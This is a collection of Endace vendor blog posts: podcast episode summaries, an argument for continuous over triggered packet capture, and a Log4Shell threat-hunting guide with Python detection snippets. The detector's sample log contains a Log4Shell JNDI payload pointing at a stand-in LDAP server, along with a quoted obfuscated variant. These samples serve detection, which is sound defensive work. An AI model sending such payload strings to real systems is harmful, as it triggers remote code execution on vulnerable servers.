Endace Packet Forensics Files: Episode #33

Original Entry by : Michael Morris

Michael talks to NIST Fellow, Ron Ross

By Michael Morris, Director of Global Business Development, Endace


Michael Morris, Director of Global Business Development, Endace

The dynamic nature and complexity of many organizations’ cyber infrastructure makes it hard enough to keep it running and performing, let alone to maintain the highest levels of security to protect your IP and data. But do you know what the highest security standards actually are?

In this episode of the Endace Packet Forensics Files, I talk with NIST Fellow Ron Ross, who shares how cyber security standards are evolving to keep pace with new threats and challenges. Ron highlights where he sees most organizations falling short and the highest priorities they should be addressing. He also shares insights into new standards and recommendations for protecting operational technologies, which are becoming an attractive target for threat actors.

Finally, Ron talks about the need to move from a mindset of “prevention” to building “resiliency” into your security architecture to stay ahead of cyberthreats.

Other episodes in the Secure Networks video/audio podcast series are available here.


Triggered vs Continuous Capture

Original Entry by : Cary Wright

Can security teams afford to collect only a fraction of the evidence necessary to run down cyber attacks?

By Cary Wright, VP Product Management, Endace


Cary Wright, VP Product Management, Endace

Security teams rely on a variety of data sources when investigating security threats, including network security logs, endpoint detection logs, and logs from the various servers and AAA devices in the network. But often these logs are not sufficient to determine the seriousness and extent of a threat – they may be missing information, or may have been manipulated by an attacker. So many analysts turn to continuous Full Packet Capture (FPCAP) to fully analyse threat activity.

Continuous Full Packet Capture records every packet (regardless of rules) to disk in a large rotating buffer, ensuring that any and all threat traffic is recorded for later analysis. FPCAP will reveal all the various stages of an attack, including the initial exploit, command and control communications, surveillance and execution phases. FPCAP is very trustworthy because it cannot be manipulated by an attacker. And because all packets are being recorded we can be sure we have a record of all threat activity, whether that threat is detectable by security monitoring tools or not. Historically, it has been expensive to deploy enough FPCAP storage to get the recommended 30 days of look-back needed by security analysts. This is where triggered capture enters the story.
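To put that storage challenge in concrete terms, here is a rough back-of-the-envelope sizing sketch. The 10 Gbps link rate and 40% average utilization are illustrative assumptions (not Endace figures), and compression is ignored:

```python
# Rough storage sizing for continuous full packet capture (illustrative only).

def fpcap_storage_tb(link_gbps: float, avg_utilization: float, days: int) -> float:
    """Approximate storage (decimal terabytes) needed to retain `days`
    of continuous capture on a link of `link_gbps`, running at
    `avg_utilization` (0.0-1.0). Ignores compression and capture overhead."""
    bytes_per_sec = link_gbps * 1e9 / 8 * avg_utilization
    total_bytes = bytes_per_sec * 86_400 * days
    return total_bytes / 1e12

# A 10 Gbps link averaging 40% utilization, retained for 30 days:
print(round(fpcap_storage_tb(10, 0.4, 30)))  # → 1296 (TB, i.e. ~1.3 PB)
```

That petabyte-scale figure for a single busy link is what historically pushed teams toward triggered capture; the article's point is that falling storage costs have changed this trade-off.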

What is Triggered Packet Capture?

The concept of triggered packet capture is to capture only those packets related to detected or likely threats and discard the rest. The goal is to reduce the storage capacity needed to provide the necessary look-back period and thereby minimize the cost of storage.

One approach is to create rules or triggers to capture specific sequences or flows of packets and ignore anything that doesn’t match these rules. Recorded packets are stored in a unique packet capture (PCAP) file on a local file system or RAID array and at the same time an event notification may be logged to a SIEM or other security monitoring tools to ensure that PCAP can be found later.
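A minimal sketch of that rule-plus-notification flow is below. The rule format, toy packet representation, event fields, and PCAP file naming are all hypothetical simplifications for illustration, not any vendor's actual API:

```python
import json

# Hypothetical trigger rule: capture any flow to a suspicious destination port.
RULES = [{"name": "suspicious-ldap", "dst_port": 389}]

def process_packet(pkt: dict, captured: dict, events: list) -> None:
    """Match a (toy) packet dict against trigger rules. On a match, buffer
    the packet for that event's PCAP file and, on first sight of the flow,
    log a SIEM-style notification pointing at where the PCAP will live."""
    for rule in RULES:
        if pkt["dst_port"] == rule["dst_port"]:
            key = (rule["name"], pkt["src"], pkt["dst"])
            if key not in captured:
                captured[key] = []
                events.append(json.dumps({
                    "rule": rule["name"],
                    "src": pkt["src"], "dst": pkt["dst"],
                    # Reference so the PCAP evidence can be found later:
                    "pcap": f"{rule['name']}-{pkt['src']}.pcap",
                }))
            captured[key].append(pkt)  # non-matching packets are discarded

captured, events = {}, []
process_packet({"src": "10.0.0.5", "dst": "203.0.113.9", "dst_port": 389}, captured, events)
process_packet({"src": "10.0.0.5", "dst": "203.0.113.9", "dst_port": 443}, captured, events)
print(len(events))  # → 1 (the port-443 packet matched no rule and was dropped)
```

Note how the second packet simply vanishes: this is exactly the evidence loss the rest of the article argues against.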

Alternatively, the trigger rule might be a firewall signature or rule that causes a handful of packets to be recorded for that event, showing what caused the rule to fire. NGFWs often provide this option, but typically with only very limited storage capacity.

A second approach is to only capture those packets that your security monitoring tools don’t recognise as “normal” on the basis that this anomalous traffic could potentially indicate a threat or attack.

The Problems with Triggered Packet Capture

There are serious flaws with both the approaches above that will leave security teams lacking the PCAP evidence they need to properly investigate events.

Firstly, it’s really not possible to predict ahead of time what attacks you might be subject to. What about attacks that leverage the next Heartbleed, SolarWinds, or Log4j 2 type of vulnerability? How can you write triggers or rules that will ensure you reliably capture all the relevant packets related to future, unknown threat vectors and vulnerabilities? More than likely you will miss these attacks.

Secondly, capturing the packets relating to an initial trigger event such as an intrusion is useful, but it only tells part of the story. An initial exploit is just the beginning of an attack. You also need to capture downstream activity such as command and control communications, lateral movement, surveillance, exfiltration and other malicious activity. These will often be unique to each victim once the initial exploit has been successfully executed. And to investigate these conclusively you need access to full packet data. You can’t reconstruct exfiltrated data or malware drops from metadata.

Lastly, attackers often try to camouflage their activity by using common protocols and traffic patterns to make their malicious activity look like normal user behavior. Capturing only “unknown” or “anomalous” traffic will most likely miss this activity.

These problems make triggered capture very costly: because your team has only part of the story, they must guess at what might have happened and assume the worst case when reporting to customers, markets, or affected parties. That lack of concrete evidence is an expensive price to pay for saving a few dollars on storage.

Only Full Packet Data provides a Complete Picture

During the incident response process, once an exploit has been detected analysts then need to look at any subsequent activity from the affected host or hosts – such as payload downloads, command-and-control (C2) communications, lateral movement to other hosts on the network, etc.

Only by examining full packet data can we really start to understand the full impact of a detected threat. If we only have triggered capture available, and no packets were captured relating to activity after the initial exploit was detected, how can we tell whether a backdoor was installed? Or what data was exfiltrated, so we can understand our legal obligations to notify affected parties? These sorts of questions cannot remain unanswered.

Advances in storage media, capture techniques and compression technology have made continuous full PCAP affordable now. So there’s no longer a need to compromise by deploying unreliable Triggered Capture to save a few bucks on disk storage. It’s simpler, faster, and much more robust to capture every packet so we are prepared to investigate any threat, new or old. Continuous full PCAP ensures teams can respond to incidents quickly and confidently, and in the long run this significantly reduces the cost of cybersecurity.


Endace Packet Forensics Files: Episode #32

Original Entry by : Michael Morris

Michael talks to Merritt Baer, Principal in the Office of the CISO at AWS

By Michael Morris, Director of Global Business Development, Endace


Michael Morris, Director of Global Business Development, Endace

Is your organization trying to implement enterprise-level security at scale, but you’re not sure where to focus?

In this episode of the Endace Packet Forensics Files, I talk with Merritt Baer, Principal in the Office of the CISO at AWS, who shares her experience of how to design and build robust, dynamic security at scale. Merritt discusses what security at scale looks like, some of the things that are often missed, and how to protect rapidly evolving hybrid cloud infrastructures. She highlights some common pitfalls that organizations run into as they shift workloads to cloud providers, and how to pivot your SOC teams and tools to ensure you have robust security forensics in place.

Finally, Merritt examines how adopting SOAR platforms can help, and things you can do to prevent gaps and breakdowns in your security posture.

Other episodes in the Secure Networks video/audio podcast series are available here.


Log4j 2: A Week Look Back

Original Entry by : Michael Morris

Do you know if you have been attacked?

By Michael Morris, Director of Global Business Development, Endace


Michael Morris, Director of Global Business Development, Endace

Log4j 2 – how can you see if you've been attacked?

Many organizations have been scrambling this week to search their networks for any use of Log4j 2 libraries and quickly patch applications, systems, appliances, or devices that might be using them. Lots of cycles are being spent reaching out to equipment and software vendors to determine whether their systems or applications are potentially impacted, and applying fixes and updates to stop potential compromises. The primary response for most security teams has been to apply patches and plug the holes.

But what exactly is the threat? The Apache Log4j 2 Java library is vulnerable to a remote code execution vulnerability (CVE-2021-44228) known as Log4Shell. It gives remote, unauthenticated attackers the ability to execute arbitrary code loaded from a malicious server, with the privileges of the Log4j 2 process.

The attack process is nicely illustrated in this diagram from the Swiss Government Computer Emergency Response Team:

 

Log4J2 - JNDI attack process
(from: https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/)

Any system with this vulnerability is now an entry point for the seeding or running of remote code execution that could then conduct any number of other nefarious activities.

I have been reading numerous articles and attending various seminars from threat intel teams, such as Palo Alto Networks’ Unit 42, that discuss the scale and severity of the potential risks to organizations from this zero-day threat. Several key takeaways stand out.

First, because of the prevalence of this vulnerability, literally millions of systems are at risk. Second, because of the scale of attacks leveraging this vulnerability, there have already been several compromises and ransomware attacks. However, much of the threat actor activity to this point appears to be reconnaissance and the planting of additional malware that can be used later, after threat actors have obtained initial access to a network and the systems on it.

Our technology partner, Keysight Technologies, has been tracking honeypot activity which shows huge numbers of exploitation attempts – demonstrating how many threat actors are scanning the internet looking for vulnerable systems.

Industry-wide there are already a huge number of bots scanning the internet simply looking for openings. Key advice from threat intel teams is to immediately isolate any impacted servers as they are truly open backdoors to the rest of your infrastructure. There are numerous tools out there to scan your environment for Log4j 2 use.

Anywhere Log4j 2 is found, you need to isolate the system and investigate for any potential compromise. It’s essential to put in place policies, rules, and filter protections to monitor outbound (egress) traffic to unknown IP addresses. Apply filters and pay extra attention to common protocols like LDAP, LDAPS, RMI, and DNS, as these are key protocols being leveraged for lateral movement and reconnaissance. Look for anomalous or unexpected traffic to and from potentially compromised systems if you are unable to isolate them.
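As a sketch, that egress-monitoring advice reduces to a simple filter like the one below. The watched-port list and the "known good" allow-list are illustrative assumptions; a real deployment would drive this from your firewall or flow data:

```python
# Flag outbound connections on protocols commonly abused after a Log4Shell
# compromise. Port list and allow-list are illustrative, not prescriptive.
WATCHED_PORTS = {389: "LDAP", 636: "LDAPS", 1099: "RMI", 53: "DNS"}
KNOWN_GOOD = {"10.0.0.53"}  # e.g. the internal DNS resolver (assumed address)

def flag_egress(conns):
    """Given (dst_ip, dst_port) pairs for outbound connections, return
    (protocol, dst_ip) pairs for traffic to unknown destinations on
    watched ports -- candidates for closer investigation."""
    return [(WATCHED_PORTS[port], dst)
            for dst, port in conns
            if port in WATCHED_PORTS and dst not in KNOWN_GOOD]

conns = [("10.0.0.53", 53), ("198.51.100.7", 389), ("192.0.2.10", 443)]
print(flag_egress(conns))  # → [('LDAP', '198.51.100.7')]
```

Anything this flags is only a lead, not a verdict; confirming it requires the packet-level review described below.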

Of course, you should also ensure your IDSs and firewalls have updated rule sets for Log4j 2 so that you can block or detect any future attempts to infect your network. This needs to happen quickly so you can get on with the job of reviewing any damage that may already have been done.

If you’re collecting network metadata in a SIEM such as Splunk or Elastic, the first place to start looking is to search all HTTP transactions for strings containing JNDI calls. Our partner, Splunk, published a blog on how to do this here:

https://www.splunk.com/en_us/blog/security/log4shell-detecting-log4j-vulnerability-cve-2021-44228-continued.html
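As a starting point, a naive search for plain JNDI lookup strings in HTTP metadata might look like the sketch below. Be aware that attackers heavily obfuscate these strings (e.g. nested lookups such as `${${lower:j}ndi:...}`), so a miss here does not prove you are clean; the Splunk post above covers more robust queries:

```python
import re

# Naive detector for unobfuscated JNDI lookup strings in HTTP request
# fields (URIs, User-Agent and other headers, bodies).
JNDI_RE = re.compile(r"\$\{jndi:(ldap|ldaps|rmi|dns)://", re.IGNORECASE)

def find_jndi(http_lines):
    """Return the log lines that contain a plain JNDI lookup string."""
    return [line for line in http_lines if JNDI_RE.search(line)]

logs = [
    "GET /index.html User-Agent: Mozilla/5.0",
    "GET / User-Agent: ${jndi:ldap://203.0.113.66:1389/a}",
]
print(len(find_jndi(logs)))  # → 1
```

A hit from a search like this tells you an exploit was attempted; whether it succeeded is what the packet data answers next.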

Once you have identified any JNDI calls, it’s critical to review the recorded network packet data to determine if any outgoing connections were made from potentially compromised servers.

EndaceProbes can capture weeks or months of packet data, allowing you to quickly review potential threats that may have occurred prior to the public announcement of the Log4j 2 vulnerability. Chris Greer published a very useful YouTube video on how to use Wireshark to identify and analyze a Log4j 2 attack. It is well worth watching.

Once you have identified connections that contain the JNDI string, you can quickly examine any subsequent outgoing connections from the affected host to see whether successful contact was made with the malicious LDAP server, downloading Java malware to infect your server. Knowing whether or not this step happened will save your team many days of incident response and allow them to focus on the servers that have actually been compromised.

Good luck with the Log4j 2 threat hunting! To learn more about how cost-effective and simple it can be to have an always-on network packet capture platform, integrated with the rest of your security tools, to help you search for Log4j 2 and other zero-day attacks, go to www.endace.com.


Endace Packet Forensics Files: Episode #31

Original Entry by : Michael Morris

Michael talks to Kamal Khlefat, Product Manager, LinkShadow

By Michael Morris, Director of Global Business Development, Endace


Michael Morris, Director of Global Business Development, Endace

Modernizing the SOC is one of the latest trends cyber security teams are undertaking to stay current and on a level playing field with today’s threat actors. Whether it is adapting simply to keep up with the volume of threats, or implementing AI and ML technologies to find and prevent more sophisticated threat vectors, SecOps teams need to improve and upgrade.

In this episode of the Endace Packet Forensics Files, I talk with seasoned SOC Director, Kamal Khlefat, now Product Manager at LinkShadow, who shares his perspectives on the movement to modernize the SOC.

Kamal gives his insight into where most SOC teams are struggling and the gaps organizations have in their cybersecurity defenses. He shares some observations about what customers are doing to handle ever-increasing alert volumes and the fatigue analysts suffer in their relentless effort to investigate and troubleshoot every indicator of compromise. And, finally, Kamal highlights some of the differences he is seeing between industry verticals like government, finance, energy, and retail.

Other episodes in the Secure Networks video/audio podcast series are available here.


Endace Packet Forensics Files: Episode #30

Original Entry by : Michael Morris

Michael talks to Tony Krzyzewski, Director of SAM for Compliance and Global Cyber Alliance Ambassador

By Michael Morris, Director of Global Business Development, Endace


Michael Morris, Director of Global Business Development, Endace

In this episode of the Endace Packet Forensics Files, I talk with Tony Krzyzewski, Director of SAM for Compliance, Global Cyber Alliance Ambassador, and New Zealand’s Convenor on the International Standards Organization SC27 Information Security, Cybersecurity and Privacy Protection Standards Committee.

With more than four decades working in IT and Networking, and almost three decades in cybersecurity, there are few more experienced practitioners than Tony. In this episode, Tony draws on his extensive experience to give some practical, pragmatic advice about where organizations need to focus to improve their cyber defenses. He highlights the importance of focusing on operational management processes in any cyber security program, and reinforces the mantra I have been hearing from many CISOs about the importance of regularly practising and performing “Security FireDrills”.

Tony talks about his long-time campaign to encourage organizations to adopt DMARC, “Domain-based Message Authentication, Reporting and Conformance” policies to improve protections against fraudulent email and phishing attacks.

Finally, Tony gives his perspective on the massive surge in SOAR and XDR solutions in the market and how that is impacting organizations’ security postures, and puts on his predictions hat as he talks about what to look out for in the year ahead.

Other episodes in the Secure Networks video/audio podcast series are available here.


Endace Packet Forensics Files: Episode #29

Original Entry by : Michael Morris

Michael talks to Tim Dales, VP Labs and Analyst, IT Brand Pulse

By Michael Morris, Director of Global Business Development, Endace


Michael Morris, Director of Global Business Development, Endace

What is the “Total Cost of Ownership” for security teams to get absolute forensics with full packet capture?

In this episode of the Endace Packet Forensics Files, I talk with Tim Dales, VP of Labs and Analyst for IT Brand Pulse. Tim shares the results of an IT Brand Pulse study that examines the cost of in-house-developed packet capture solutions versus off-the-shelf, vendor-built solutions.

Tim shares details of the report’s findings including the pros and cons and some of the key things many people don’t consider before trying to build solutions in-house.

Finally, Tim discusses key changes in how organizations are thinking about their security architectures and the gaps they are looking to address. He shares the importance of integrated workflows in helping analysts to accelerate investigation times and confirm or dismiss potential indicators of compromise more definitively.

Other episodes in the Secure Networks video/audio podcast series are available here.


Endace Packet Forensics Files: Episode #28

Original Entry by : Michael Morris

Michael talks to Tim Wade, Director, Office of the CTO, Vectra AI

By Michael Morris, Director of Global Business Development, Endace


Michael Morris, Director of Global Business Development, Endace

Security Operations teams at many organizations are reviewing processes and tools as breaches continue to happen, investigation times remain too long, outcomes are uncertain, and too many alerts are going unaddressed. Organizations are asking, “why are we spending so much money on security without tangible results?” They are looking at “SOC Modernization” initiatives to help them defend effectively against increasingly sophisticated threat actors.

In this episode of the Endace Packet Forensics Files, I talk with Tim Wade, Technical Director from the Office of the CTO at Vectra AI, who shares his insights into the “SOC Modernization” trend and the three pillars that he suggests require a change in thinking to ultimately be successful.

Tim starts with a fundamental change in philosophy – he suggests SOC teams need to shift from a “prevention” to a “resiliency” approach to cyberdefense. He illustrates the importance of taking incremental and iterative steps with monthly and even weekly measurement and review cycles to evaluate progress.

Tim suggests SOC teams need to better understand the rules of the game so they can step back and actively work to break them – because that is exactly what our threat actor adversaries are doing every day. Challenge everything and think like your opponent.

Finally, Tim advises CISOs that modernization needs to address challenges holistically. Not just focusing on technologies, but also ensuring they are working on people and processes and gaps in training, communication, and thinking.

Other episodes in the Secure Networks video/audio podcast series are available here.